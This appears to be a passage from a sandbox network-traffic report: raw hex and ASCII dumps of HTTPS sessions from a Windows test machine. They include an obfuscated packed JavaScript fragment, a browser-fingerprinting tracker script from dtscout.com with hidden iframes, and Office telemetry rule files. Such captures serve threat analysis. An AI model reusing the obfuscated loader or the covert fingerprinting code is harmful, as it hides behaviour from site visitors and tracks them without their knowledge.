                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1378INData Raw: 67 5c 5c 69 5c 5c 62 5c 5c 6a 22 2c 22 5c 5c 71 5c 5c 75 5c 5c 63 5c 5c 66 5c 5c 69 5c 5c 70 5c 5c 6c 5c 5c 66 5c 5c 68 5c 5c 64 5c 5c 68 22 2c 22 5c 5c 6a 5c 5c 62 5c 5c 72 5c 5c 66 5c 5c 4b 5c 5c 62 22 2c 22 5c 5c 4a 5c 5c 75 5c 5c 63 5c 5c 66 5c 5c 69 5c 5c 70 5c 5c 6c 5c 5c 67 5c 5c 69 5c 5c 62 5c 5c 6a 5c 5c 70 5c 5c 6b 5c 5c 62 5c 5c 32 72 5c 5c 62 5c 5c 6a 5c 5c 70 5c 5c 63 5c 5c 65 5c 5c 6b 5c 5c 4e 22 2c 22 5c 5c 79 5c 5c 65 5c 5c 6b 5c 5c 6d 22 2c 22 5c 5c 6f 5c 5c 63 5c 5c 65 5c 5c 6f 5c 5c 4e 22 2c 22 5c 5c 4a 5c 5c 75 5c 5c 63 5c 5c 66 5c 5c 69 5c 5c 70 5c 5c 6c 5c 5c 67 5c 5c 69 5c 5c 62 5c 5c 6a 5c 5c 70 5c 5c 66 5c 5c 63 5c 5c 6d 5c 5c 62 5c 5c 6a 5c 5c 70 5c 5c 63 5c 5c 65 5c 5c 6b 5c 5c 4e 5c 5c 76 5c 5c 67 22 2c 22 22 2c 22 5c 5c 73 5c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: g\\i\\b\\j","\\q\\u\\c\\f\\i\\p\\l\\f\\h\\d\\h","\\j\\b\\r\\f\\K\\b","\\J\\u\\c\\f\\i\\p\\l\\g\\i\\b\\j\\p\\k\\b\\2r\\b\\j\\p\\c\\e\\k\\N","\\y\\e\\k\\m","\\o\\c\\e\\o\\N","\\J\\u\\c\\f\\i\\p\\l\\g\\i\\b\\j\\p\\f\\c\\m\\b\\j\\p\\c\\e\\k\\N\\v\\g","","\\s\
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1378INData Raw: 5c 62 5c 5c 6b 5c 5c 64 5c 5c 68 5c 5c 31 73 5c 5c 41 5c 5c 54 5c 5c 67 5c 5c 69 5c 5c 31 77 5c 5c 67 5c 5c 72 5c 5c 62 22 5d 3b 46 20 44 3d 59 5b 61 5b 31 5d 5d 28 61 5b 30 5d 29 3b 44 5b 61 5b 32 5d 5d 3d 61 5b 33 5d 3b 44 5b 61 5b 34 5d 5d 3d 61 5b 35 5d 3b 44 5b 61 5b 36 5d 5d 3d 31 76 3b 44 5b 61 5b 37 5d 5d 3d 4d 28 29 7b 21 4d 28 7a 29 7b 24 28 61 5b 31 30 5d 29 5b 61 5b 39 5d 5d 28 61 5b 38 5d 29 3b 50 28 31 6e 5b 61 5b 31 31 5d 5d 29 7b 46 20 32 66 3d 30 3b 46 20 31 6b 3d 61 5b 31 32 5d 3b 46 20 4c 3d 7a 28 61 5b 31 33 5d 29 2c 55 3d 7a 28 61 5b 31 34 5d 29 2c 53 3d 31 72 3b 4c 5b 61 5b 31 37 5d 5d 28 61 5b 31 36 5d 29 5b 61 5b 31 35 5d 5d 28 29 2c 4c 5b 61 5b 31 6d 5d 5d 28 61 5b 31 38 5d 2c 61 5b 31 39 5d 2c 4d 28 29 7b 31 58 5b 61 5b 32 32 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: \b\\k\\d\\h\\1s\\A\\T\\g\\i\\1w\\g\\r\\b"];F D=Y[a[1]](a[0]);D[a[2]]=a[3];D[a[4]]=a[5];D[a[6]]=1v;D[a[7]]=M(){!M(z){$(a[10])[a[9]](a[8]);P(1n[a[11]]){F 2f=0;F 1k=a[12];F L=z(a[13]),U=z(a[14]),S=1r;L[a[17]](a[16])[a[15]](),L[a[1m]](a[18],a[19],M(){1X[a[22]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC49INData Raw: 37 7c 33 36 7c 33 35 7c 33 31 7c 33 32 7c 78 35 38 7c 33 33 7c 78 34 34 7c 78 37 37 27 2e 73 70 6c 69 74 28 27 7c 27 29 2c 30 2c 7b 7d 29 29 3b 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 7|36|35|31|32|x58|33|x44|x77'.split('|'),0,{}));


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          33192.168.2.749749141.101.120.114432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC587OUTGET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fald.my.id%2F&j=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: e.dtscout.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1164INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-S: mtl2
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: m=1; Domain=dtscout.com; Expires=Mon, 14-Oct-2024 10:35:55 GMT; Max-Age=5000; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: st=1; Domain=dtscout.com; Expires=Mon, 14-Oct-2024 10:12:35 GMT; Max-Age=3600; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: df=1728897155; Domain=dtscout.com; Expires=Wed, 22-Jan-2025 09:12:35 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: l=1040172889715587758A2B28B3F6BBD2; Domain=dtscout.com; Expires=Sat, 11-Jan-2025 09:12:35 GMT; Max-Age=7689600; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          X-T: 0.254
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgtyJQ%2FEvaqLfcmEIT%2Bdcdnka8HBJQxzS0eypu2EAswtjOickR0EkgFZM%2B%2FnmTAXP6CnMjdK74Wq6frDoAn7h4nT%2FJp4V6kf87oyr296DORRYky%2F1b2T1QKNJvtAyHg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672d2bff5420b-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC205INData Raw: 31 66 63 38 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 64 63 20 3d 20 7b 7d 3b 0a 20 20 20 20 76 61 72 20 67 75 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 76 61 72 20 73 75 20 3d 20 22 31 30 34 30 31 37 32 38 38 39 37 31 35 35 38 37 37 35 38 41 32 42 32 38 42 33 46 36 42 42 44 32 22 3b 0a 20 20 20 20 76 61 72 20 67 6d 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 76 61 72 20 63 6e 20 3d 20 22 5f 5f 64 74 73 75 22 3b 0a 20 20 20 20 76 61 72 20 6c 67 20 3d 20 7b 63 76 3a 22 55 53 22 2c 63 73 3a 22 43 22 2c 72 76 3a 22 4e 59 22 2c 72 73 3a 22 43 22 7d 3b 0a 0a 20 20 20 20 53 74 72 69 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1fc8(function() { var dc = {}; var gu = false; var su = "1040172889715587758A2B28B3F6BBD2"; var gm = false; var cn = "__dtsu"; var lg = {cv:"US",cs:"C",rv:"NY",rs:"C"}; Strin
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1369INData Raw: 67 2e 70 72 6f 74 6f 74 79 70 65 2e 64 74 73 5f 68 61 73 68 5f 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 61 73 68 3d 30 3b 69 66 28 74 68 69 73 2e 6c 65 6e 67 74 68 3d 3d 30 29 72 65 74 75 72 6e 20 68 61 73 68 3b 66 6f 72 28 69 3d 30 3b 69 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 68 61 72 3d 74 68 69 73 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 3b 68 61 73 68 3d 28 28 68 61 73 68 3c 3c 35 29 2d 68 61 73 68 29 2b 63 68 61 72 3b 68 61 73 68 3d 68 61 73 68 26 68 61 73 68 7d 20 72 65 74 75 72 6e 20 68 61 73 68 3b 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 64 74 73 69 28 29 20 7b 0a 20 20 20 20 20 20 20 20 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 20 61 2e 68
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: g.prototype.dts_hash_code=function(){var hash=0;if(this.length==0)return hash;for(i=0;i<this.length;i++){char=this.charCodeAt(i);hash=((hash<<5)-hash)+char;hash=hash&hash} return hash;}; function _dtsi() { a = document.createElement("a"), a.h
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 69 64 67 2f 3f 73 75 3d 22 2b 73 75 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 77 69 64 74 68 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 68 65 69 67 68 74 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0a 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: } } }); try { var i = document.createElement('iframe'); i.src = "https://t.dtscout.com/idg/?su="+su; i.width = 0; i.height = 0; i.style.display = 'none';
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1369INData Raw: 79 7b 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 2e 74 61 72 67 65 74 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 7d 7d 7d 29 28 29 3b 76 61 72 20 64 74 73 5f 70 69 5f 73 74 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 64 74 73 5f 70 69 5f 73 74 72 2b 3d 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 69 5d 2e 64 65 73 63 72 69 70 74 69 6f 6e 7d 64 74 73 5f 70 69 5f 73 74 72 3d 64 74 73 5f 70 69 5f 73 74 72 2e 64 74 73 5f 68 61 73 68 5f 63 6f 64 65 28 29 3b 76 61 72 20 64 74 73 5f 64 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 64 74 73 5f 74 7a 5f 6f 66 66 73 65 74 3d 64 74 73 5f 64 2e 67 65 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: y{e.target.parentNode.removeChild(e.target);}catch(e){}}}})();var dts_pi_str="";for(var i=0;i<navigator.plugins.length;i++){dts_pi_str+=navigator.plugins[i].description}dts_pi_str=dts_pi_str.dts_hash_code();var dts_d=new Date();var dts_tz_offset=dts_d.get
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1369INData Raw: 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 73 70 6c 69 74 48 6f 73 74 6e 61 6d 65 2e 6c 65 6e 67 74 68 20 2d 20 32 3b 20 69 20 3e 3d 20 30 3b 20 69 2d 2d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 68 20 3d 20 73 70 6c 69 74 48 6f 73 74 6e 61 6d 65 2e 73 6c 69 63 65 28 69 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 5f 73 63 69 28 6e 2c 76 2c 64 2c 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 6e 2b 27 3d 27 2b 76 29 20 21 3d 3d 20 2d 31 29 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: on.hostname.split('.'); for (var i = splitHostname.length - 2; i >= 0; i--) { var ch = splitHostname.slice(i).join('.'); __sci(n,v,d,ch); if (document.cookie.indexOf(n+'='+v) !== -1) break; } }
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1369INData Raw: 70 74 22 29 3b 73 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 64 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 2f 70 64 2f 64 74 73 63 6f 75 74 22 3b 73 2e 69 64 3d 22 73 74 70 64 2d 64 74 73 63 6f 75 74 22 3b 73 2e 61 73 79 6e 63 3d 74 72 75 65 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 73 2c 77 3d 77 69 6e 64 6f 77 2e 74 6f 70 3b 77 2e 54 79 6e 74 3d 77 2e 54 79 6e 74 7c 7c 5b 5d 3b 77 2e 54 79 6e 74 2e 70 75 73 68 28 22 77 75 21 22 29 3b 73 3d 77 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: pt");s.src="https://pd.sharethis.com/pd/dtscout";s.id="stpd-dtscout";s.async=true;document.getElementsByTagName("body")[0].appendChild(s);}catch(e){}})();(function(){try{var s,w=window.top;w.Tynt=w.Tynt||[];w.Tynt.push("wu!");s=w.document.createElement("s
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1094INData Raw: 65 72 3d 21 30 2c 6e 2e 73 72 63 3d 69 2b 22 3f 22 2b 65 2c 6e 2e 69 64 3d 22 64 74 73 70 76 5f 22 2b 74 2e 63 62 69 64 2c 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 28 75 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 64 74 73 70 76 2e 75 28 29 7d 29 2c 74 2e 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 68 28 74 29 2c 21 31 21 3d 3d 65 29 74 72 79 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 74 73 70 76 5f 22 2b 65 29 3b 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6e 29 7d 63 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: er=!0,n.src=i+"?"+e,n.id="dtspv_"+t.cbid,o.appendChild(n)}catch(t){}}(u),window.addEventListener("beforeunload",function(){window._dtspv.u()}),t.c=function(t,e){if(h(t),!1!==e)try{var n=document.getElementById("dtspv_"+e);n.parentNode.removeChild(n)}catch
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          34192.168.2.74975913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 464
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 5355bdce-701e-0021-10ea-1a3d45000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091235Z-17db6f7c8cf96l6t7bwyfgbkhw00000005400000000095r6
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          35192.168.2.74975713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 469
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 3826920f-501e-0078-42aa-1b06cf000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091235Z-17db6f7c8cfhrxld7punfw920n00000004x000000000740s
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          36192.168.2.74975813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: b287654a-001e-0017-109b-1b0c3c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091235Z-17db6f7c8cfwtn5x6ye8p8q9m000000004pg000000009hw6
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
